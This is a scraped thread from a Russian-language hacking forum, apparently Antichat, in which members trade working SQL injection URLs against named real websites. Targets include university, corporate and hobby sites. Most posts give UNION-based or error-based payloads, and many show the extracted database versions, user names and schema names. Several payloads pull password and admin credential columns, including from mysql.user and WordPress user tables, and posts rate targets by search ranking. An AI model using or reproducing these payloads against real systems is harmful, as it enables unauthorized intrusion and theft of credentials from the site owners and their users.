SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://imagine-dev.kent[antigoogle].edu/media/content/press.asp?id=712 union select 1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17 from users
    ТИЦ 275 PR 7
     
    1 person likes this.
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.culturalcapital.us/press.php?id=-8+UNION+SELECT+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13--+

    5.0.45:USCC:xtuscc@localhost
     
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.wdminc.com/products/productdetails.php?prodID=-605+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9--
    4.1.22:wdminc@localhost:wdminc
    доступа в information_schema нет

    http://www.zenunderwater.com/products.php?prodID=5+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11--
    4.1.22-standard:zenunder_zen@localhost:zenunder_zen

    http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10--
    http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,user_name,password),2,3,4,5,6,7,8,9,10+from+user_permission+limit+1,1-- (пароли)
    5.1.48-msl-usrs-sure1-log:[email protected]:asiabs_M_and_A

    http://www.vaargroephoofddorp.nl/index.php?newsgroup=29+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
    5.0.77:vaargroe@localhost:vaargroe

    http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8+from+hertsweb_joomla.wcow_users--

    http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+hertsweb_joomla.wcow_users-- (пароли)

    5.0.51b-community-nt-log:[email protected]:hertsweb_main

    http://www.sourcecodesworld.com/source/show.asp?ScriptID=-1032+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
    4.0.30-max-log:[email protected]:vyom_source

    http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11--

    http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,userid,password),5,6,7,8,9,10,11+from+users-- (пароли)
    5.0.91-community:a0195032_@localhost:a0195032_

    http://www.igps.net/about/press.php?id=-42+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8--
    5.0.51a-24+lenny4-log:[email protected]:phpdig

    http://www.mysweetbio.es/esp/marche_descr.asp?id=27+or+1=(select+db_name())--
    beautysql - бд

    http://www.nitevibe.com/gallery2/gal_descr.asp?gallery_id=18+or+1=@@version--
    Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2) - версия

    http://www.nowccc.com/detail.asp?car_cd=5017+or+1=@@version--
     
    #13423 ~d0s~, 6 Dec 2010
    Last edited: 6 Dec 2010
    1 person likes this.
  4. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Пара средних сайтов

    PR 4, тыц 60
    http://www.pcid*t*b*se.com/vendor_det*ils.php?id=-240+UNION+SELECT+1,2,3,user(),version(),d*t*b*se(),7,8,9
    Звездочку заменить на a.
    К сожалению, в базе ниче интересного не нашел.
    Вот еще один сайт, мы его ковыряли но тоже ниче не нашли:
    PR 5, тыц 30
    f cm.d k/index.php?mode=spillerinfo&ID=6%27&holdID=3&spillerID=-54%27+UNION+SELECT+1,2,3,4,5,user(),version(),d*t*b*se(),9,t*ble_n*me,11,12,13,14+FROM+inform*tion_schem*.t*bles+LIMIT+1,1+--+
    Если вдруг таки получится- стучите в ПМ.
     
    _________________________
    #13424 fl00der, 6 Dec 2010
    Last edited: 6 Dec 2010
    1 person likes this.
  5. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    В продолжении постам Konqi:
    http://mitchison.med.[antigoogle]harvard.edu/people/peopleinfo.html?ID=-4 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,1,2,3,4--
     
    3 people like this.
  6. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    293
    Likes Received:
    73
    Reputations:
    21
    http://www.ticostorecr.com/ver_categoria.php?id=3+and+1=-0+union+select+concat_ws(0x3a,passwd)+from+users--
     
    #13426 N@b$ter, 6 Dec 2010
    Last edited: 9 Dec 2010
    1 person likes this.
  7. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    http://www.amatue21.com/index.php?do=photo&albom=7+or+1+group+by+concat((select+concat(version(),0x3a,user(),0x3a)),floor(rand(0)*2))+having+avg(0)+--+

    5.0.91-community-log:amatue21_com@localhost
     
    2 people like this.
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.supplementalhealthcare.com/press.php?id=3%27+UNION+SELECT+1,2,unhex%28hex%28concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29%29%29,4,5,6,7+LIMIT+1,1--%20+


    4.1.11-Debian_4sarge8-log:supp78:[email protected]
     
  9. [AvareC]

    [AvareC] New Member

    Joined:
    16 Apr 2010
    Messages:
    64
    Likes Received:
    2
    Reputations:
    0
    по просьбе хозяина сайта уделено
     
    #13429 [AvareC], 7 Dec 2010
    Last edited: 11 Dec 2010
    1 person likes this.
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.laterna.net/laterna/press.php?ID=-pollanenm%27+UNION+SELECT+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13--+

    4.1.22-standard-log:laterna:[email protected]
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.eksigent.com/hplc/news/press.php?id=15+UNION+SELECT+concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,2,3,4--

    5.1.41-3ubuntu12:ekDB:[email protected]
     
    1 person likes this.
  12. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    avcboost_valant@localhost
    5.1.47-community-log


    maxwww@localhost
    5.1.52-log
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.programmershelp.co.uk/showcode.php?e=575+union+select+1,2,current_user,4,5,6
     
    _________________________
    1 person likes this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.oltamar.ru/press.php?id=-7%27+UNION+SELECT+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6--%20+

    5.0.77:u5170:eek:ltamar.ru@localhost
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    _http://www.trabajos.bz/verempresa.php?idemp=-625+union+select+1,2,concat_ws(0x3a,admin_user,admin_pass),4,5,6+from+admin--
     
    _________________________
  16. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.hsx.com/forum/forum.php?id=1+and+substring%28@@version,1,1%29=5
    5 верс
     
    #13436 bloodAngel, 8 Dec 2010
    Last edited: 8 Dec 2010
  17. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://bioethics.net/resources/index.php?sid=494263798&id=-1533+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20user--&t=rate&toprate=1.9999&tophits=19289
    Username: [email protected]
    Version: 4.0.27-max-log
    Database: db97930092

    Google PR: 7
     
    3 people like this.
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Code:
    http://www.awesometheory.com/tutorial.php?id=1+and+1=9+union(select+1,2,3,4,version())
     
    _________________________
    3 people like this.
  19. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    ualberta.ca
    Тиц - 950
    PR - 8

    http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14--
    5.0.88-log:web@localhost:department
    http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
    http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user,password,file_priv),5,6,7,8,9,10,11,12,13,14+from+mysql.user-- (Юзверы майскула)
    http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass),5,6,7,8,9,10,11,12,13,14+from+westbury.wp_users-- (Юзверы вордпресса)
    Также есть еще пхпбб и менее известные движки,искать на поддоменах,их много!
     
    2 people like this.
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    http://www.rociojuradofanclub.com/discografia/album.php?musica=1&album=-3/*!union+select!*/1,2,3,4,5,6,7,8,9,version(),11,12,13
     
    2 people like this.
Thread Status:
Not open for further replies.